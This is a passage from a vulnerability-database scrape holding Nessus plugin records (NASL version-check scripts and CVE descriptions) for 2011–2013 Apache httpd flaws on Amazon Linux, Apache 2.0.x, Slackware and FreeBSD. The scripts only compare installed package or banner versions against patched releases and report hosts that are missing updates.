script_xref(name:\"ALAS\", value:\"2012-46\");\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2012-46)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the fix for CVE-2011-3368 did not completely\naddress the problem. 
An attacker could bypass the fix and make a\nreverse proxy connect to an arbitrary server not directly accessible\nto the attacker by sending an HTTP version 0.9 request, or by using a\nspecially crafted URI. (CVE-2011-3639 , CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-46.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.22-1.23.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:11:58", "description": "According to its banner, the version of Apache 2.0.x running on the remote host is prior to 2.0.65. 
It is, therefore, affected by several vulnerabilities :\n\n - A flaw exists in the byte-range filter, making it vulnerable to denial of service. (CVE-2011-3192)\n\n - A flaw exists in 'mod_proxy' where it doesn't properly interact with 'RewriteRule' and 'ProxyPassMatch' in reverse proxy configurations. (CVE-2011-3368)\n\n - A privilege escalation vulnerability exists relating to a heap-based buffer overflow in 'ap_pregsub' function in 'mod_setenvif' module via .htaccess file.\n (CVE-2011-3607)\n\n - A local security bypass vulnerability exists within scoreboard shared memory that may allow the child process to cause the parent process to crash.\n (CVE-2012-0031)\n\n - A flaw exists within the status 400 code when no custom ErrorDocument is specified that could disclose 'httpOnly' cookies. (CVE-2012-0053)\n\n - A flaw exists in the 'RewriteLog' function where it fails to sanitize escape sequences written to log files, which could result in arbitrary command execution.\n (CVE-2013-1862)\n\nNote that the remote web server may not actually be affected by these vulnerabilities. 
Nessus did not try to determine whether the affected modules are in use nor did it test for the issues themselves.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2013-07-16T00:00:00", "type": "nessus", "title": "Apache 2.0.x < 2.0.65 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2013-1862"], "modified": "2019-11-27T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_0_65.NASL", "href": "https://www.tenable.com/plugins/nessus/68914", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68914);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\n \"CVE-2011-3192\",\n \"CVE-2011-3368\",\n \"CVE-2011-3607\",\n \"CVE-2012-0031\",\n \"CVE-2012-0053\",\n \"CVE-2013-1862\"\n );\n script_bugtraq_id(\n 49303,\n 49957,\n 50494,\n 51407,\n 51706,\n 59826\n );\n script_xref(name:\"EDB-ID\", value:\"17696\");\n script_xref(name:\"EDB-ID\", value:\"17969\");\n script_xref(name:\"EDB-ID\", value:\"18221\");\n script_xref(name:\"EDB-ID\", value:\"18442\");\n\n script_name(english:\"Apache 2.0.x < 2.0.65 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by several vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache 2.0.x running on the\nremote host is prior to 2.0.65. It is, therefore, affected by several\nvulnerabilities :\n\n - A flaw exists in the byte-range filter, making it\n vulnerable to denial of service. (CVE-2011-3192)\n\n - A flaw exists in 'mod_proxy' where it doesn't properly\n interact with 'RewriteRule' and 'ProxyPassMatch'\n in reverse proxy configurations. 
(CVE-2011-3368)\n\n - A privilege escalation vulnerability exists relating to\n a heap-based buffer overflow in 'ap_pregsub' function in\n 'mod_setenvif' module via .htaccess file.\n (CVE-2011-3607)\n\n - A local security bypass vulnerability exists within\n scoreboard shared memory that may allow the child\n process to cause the parent process to crash.\n (CVE-2012-0031)\n\n - A flaw exists within the status 400 code when no custom\n ErrorDocument is specified that could disclose\n 'httpOnly' cookies. (CVE-2012-0053)\n\n - A flaw exists in the 'RewriteLog' function where it\n fails to sanitize escape sequences written to log files,\n which could result in arbitrary command execution.\n (CVE-2013-1862)\n\nNote that the remote web server may not actually be affected by these\nvulnerabilities. Nessus did not try to determine whether the affected\nmodules are in use nor did it test for the issues themselves.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.0.65\");\n # https://web.archive.org/web/20130801230537/http://httpd.apache.org/security/vulnerabilities_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?366bbb5a\");\n # http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3C20130710124920.2b8793ed.wrowe@rowe-clan.net%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c309d2dd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.0.65 or later. 
Alternatively, ensure that\nthe affected modules are not in use.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1862\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Apache web server\");\n\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\nfixed_ver = '2.0.65';\nif (version =~ '^2(\\\\.0)?$') exit(1, \"The banner from the Apache server listening on port \"+port+\" - \"+source+\" - is not granular enough to make a determination.\");\nif (version !~ \"^\\d+(\\.\\d+)*$\") exit(1, \"The version of Apache listening on port \" + port + \" - \" + version + \" - is non-numeric and, therefore, cannot be used to make a determination.\");\nif (version =~ '^2\\\\.0' && ver_compare(ver:version, fix:fixed_ver) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.0.65\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, version);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:01", "description": "New httpd packages are available for 
Slackware 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current to fix security issues. The apr-util package has also been updated to the latest version.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-13T00:00:00", "type": "nessus", "title": "Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : httpd (SSA:2012-041-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:apr-util", "p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.1", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37"], "id": "SLACKWARE_SSA_2012-041-01.NASL", "href": "https://www.tenable.com/plugins/nessus/57892", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2012-041-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57892);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51705, 51706);\n script_xref(name:\"SSA\", value:\"2012-041-01\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : httpd (SSA:2012-041-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 12.0, 12.1, 12.2,\n13.0, 13.1, 13.37, and -current to fix security issues. 
The apr-util\npackage has also been updated to the latest version.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.792124\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd8f1ebc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apr-util and / or httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apr-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\nif (slackware_check(osver:\"12.0\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\nif (slackware_check(osver:\"12.1\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\nif (slackware_check(osver:\"12.2\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) 
flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:02", "description": "CVE MITRE reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker.\n\nInteger overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.\n\nAn additional exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker.\n\nA flaw was found in mod_log_config. If the '%{cookiename}C' log format string is in use, a remote attacker could send a specific cookie causing a crash. This crash would only be a denial of service if using a threaded MPM.\n\nA flaw was found in the handling of the scoreboard. 
An unprivileged child process could cause the parent process to crash at shutdown rather than terminate cleanly.\n\nA flaw was found in the default error response for status code 400.\nThis flaw could be used by an attacker to expose 'httpOnly' cookies when no custom ErrorDocument is specified.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-02T00:00:00", "type": "nessus", "title": "FreeBSD : apache -- multiple vulnerabilities (4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_4B7DBFAB4C6B11E1BC160023AE8E59F0.NASL", "href": "https://www.tenable.com/plugins/nessus/57786", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57786);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"FreeBSD : apache -- multiple vulnerabilities (4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE MITRE reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. 
In\ncertain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow.\n\nAn additional exposure was found when using mod_proxy in reverse proxy\nmode. In certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n\nA flaw was found in mod_log_config. If the '%{cookiename}C' log format\nstring is in use, a remote attacker could send a specific cookie\ncausing a crash. This crash would only be a denial of service if using\na threaded MPM.\n\nA flaw was found in the handling of the scoreboard. 
An unprivileged\nchild process could cause the parent process to crash at shutdown\nrather than terminate cleanly.\n\nA flaw was found in the default error response for status code 400.\nThis flaw could be used by an attacker to expose 'httpOnly' cookies\nwhen no custom ErrorDocument is specified.\"\n );\n # https://vuxml.freebsd.org/freebsd/4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4c313f58\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
